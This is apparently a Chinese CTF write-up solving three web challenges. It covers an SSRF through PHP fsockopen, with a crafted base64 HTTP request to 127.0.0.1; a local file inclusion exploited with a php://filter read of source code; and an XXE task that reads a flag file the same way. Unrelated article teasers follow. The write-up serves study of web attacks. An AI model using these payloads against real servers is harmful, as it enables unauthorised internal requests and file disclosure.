nssctf[HNCTF 2022 WEEK2]ez_ssrf,polarctf靶场web简单-session包含/web中等-xxe

1.nssctf[HNCTF 2022 WEEK2]ez_ssrf

首先dirsearch扫描一下

发现有flag.php打开后显示localhost

 

fsockopen() 函数是用于建立一个 socket 连接,一般出现这个函数都是有ssrf的

fsockopen(hostname, port, errno, errstr, timeout)

允许连接另一个服务器

设置主机为127.0.0.1 从而造成ssrf

参数:

hostname 如果安装了OpenSSL,那么你也许应该在你的主机名地址前面添加访问协议ssl://或者是tls://,从而可以使用基于TCP/IP协议的SSL或者TLS的客户端连接到远程主机。

port 端口号。如果对该参数传一个-1,则表示不使用端口,例如unix://。

errno 如果errno的返回值为0,而且这个函数的返回值为 FALSE ,那么这表明该错误发生在套接字连接(connect())调用之前,导致连接失败的原因最大的可能是初始化套接字的时候发生了错误。

errstr 错误信息将以字符串的信息返回。

timeout 设置连接的时限,单位为秒。

 

 

<?php

$out = "GET /flag.php HTTP/1.1\r\n";

$out .= "Host: 127.0.0.1\r\n";

$out .= "Connection: Close\r\n\r\n";

echo base64_encode($out);

?>

出来是R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBDbG9zZQ0KDQo=

 

为什么不用在线base64编码呢,因为tmd格式一直不过,\r\n加了不行

 

那为什么port是80端口呢,因为80端口是 HTTP 服务的默认端口,其他的试了没回显

 

?host=127.0.0.1&port=80&data=R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBDbG9zZQ0KDQo=

 

 

 

2.web简单-session包含

法一:

 

随便在输入框输入东西,出现两个链接,

随便点击任意一个url会变成如下形式

 

/action.php?file=2.txt

所以猜测存在文件包含

 

尝试使用伪协议读取action.php

 

 

file=php://filter/read=convert.base64-encode/resource=action.php

 

base64解码得到源码

<?php

session_start();

error_reporting(0);

$name = $_POST['name'];

if($name){

    $_SESSION["username"] = $name;

}

include($_GET['file']);

?>

<!DOCTYPE html>

<html>

<head>

</head>

<body>

<a href=action.php?file=1.txt>my dairy</a>

<a href=action.php?file=2.txt>my booklist</a>

</body>

</html>

 

3.xxe

点开phpinfo后ctrl+f查找flag,有一个,填一下是错的

 

用dirsearch扫一下

 

 

 

 

 

打开看看界面

loadXML()与题目呼应上了,

这是 PHP 的警告信息和DOMDocument对象的输出,核心是代码尝试用DOMDocument::loadXML()处理空字符串,导致触发警告,且 XML 解析失败

 

把该页面放到bp

 

 

 

写上xml语句

 

 

 

然后第一页其实告诉了flag在哪里,直接看

 

用伪协议读取

php://filter/read=convert.base64-encode/resource=flagggg.php

 

 

 

 

最后解码即可

 

Read more

从‘看得见’到‘看得懂’:PaddleOCR-VL-WEB赋能智能OCR升级

从“看得见”到“看得懂”:PaddleOCR-VL-WEB赋能智能OCR升级 在银行票据处理中心、政务服务中心的档案科、电商商家后台,每天有数以万计的合同、发票、身份证、说明书、学术论文被扫描上传。过去,这些图像交由传统OCR系统处理——结果是一长串无序文字,像打翻的铅字盒:你能看见所有字符,却不知道哪一行是金额、哪个框是签章位置、表格里哪列对应税率、公式中哪个符号是求和变量。 而今天,一张PDF截图上传后3秒内,系统不仅返回清晰文本,还自动标注出“标题层级”“段落类型”“表格结构”“数学公式语义”“图表说明文字”,甚至能回答“这份采购合同的付款条件是什么?”——这不再是OCR,而是文档理解(Document Understanding)。 PaddleOCR-VL-WEB 镜像正是这一跃迁的关键载体。它不是对旧OCR的简单提速,而是用视觉-语言联合建模,把“图像识别”升级为“文档认知”。它不只告诉你“这里有一行字”,更告诉你“这行字是条款编号,属于第3条违约责任下的子项”

PyWebview浅谈

PyWebview浅谈

pywebview是一个轻量级、跨平台的 Python 库,核心功能是在桌面应用中嵌入系统原生的 WebView 组件,让你可以用 HTML/CSS/JavaScript 构建 UI,同时用 Python 处理逻辑——完美匹配“Web 技术做 UI + Python 做后端”的需求。 1. 核心定位 pywebview 不是“打包 Chromium 的 Electron 替代品”,而是复用系统自带的 WebView(如 Windows 的 Edge/IE、macOS 的 WebKit、Linux 的 GTK+Webkit/Qt WebEngine),因此: * 体积极小(

openclaw web UI 无法访问 not found

## 问题解决总结 根本原因 :Gateway 的 resolveControlUiRootSync 函数在自动查找控制 UI 目录时,没有包含 node_modules/openclaw/dist/control-ui 作为候选路径。手动指定相对路径时,可能因为工作目录解析问题无法正确找到目录。 最终解决方案 : 1. 将控制 UI 文件从 node_modules/openclaw/dist/control-ui 复制到项目根目录       E:\你实际的目录\control-ui       (建立一个英文,且没有符号的目录,“-”和“_",会引起混淆) 2. 在配置文件中使用绝对路径指定 controlUi.root: "E:\\你实际的目录\\control-ui" 编辑 openclaw.json "

【硬核排查】挂了代里还是“裸奔”?深度解析 WebRTC 泄露与 Google 账号风控机制

【硬核排查】挂了代里还是“裸奔”?深度解析 WebRTC 泄露与 Google 账号风控机制

本文仅用于技术研究,禁止用于非法用途。 Author:枷锁 前言:一个“玄学”的网络故障 最近在进行网络环境配置时遇到了一个非常反直觉的现象: 我在本地开启了 戴笠,状态栏显示连接正常,访问Gemini毫无压力。但是,当我打开 ip138 或百度搜索 “IP” 时,显示的却依然是我本地的 ISP 真实 IP。更糟糕的是,我的 Google 账号开始频繁触发安全风控——要么是登录时无限弹出验证码,要么是刚登上去就被踢下线。 这不仅仅是“连不上”的问题,而是一个典型的网络协议泄露与安全风控案例。本着“知其然更要知其所以然”的精神,我深扒了其背后的技术原理,发现罪魁祸首主要有两个:路由分流策略与WebRTC 协议漏洞。 第一部分:为什么 ip138 “出卖”了你?—— 聊聊路由分流 (Split Tunneling) 很多新手判断 是否生效的标准是: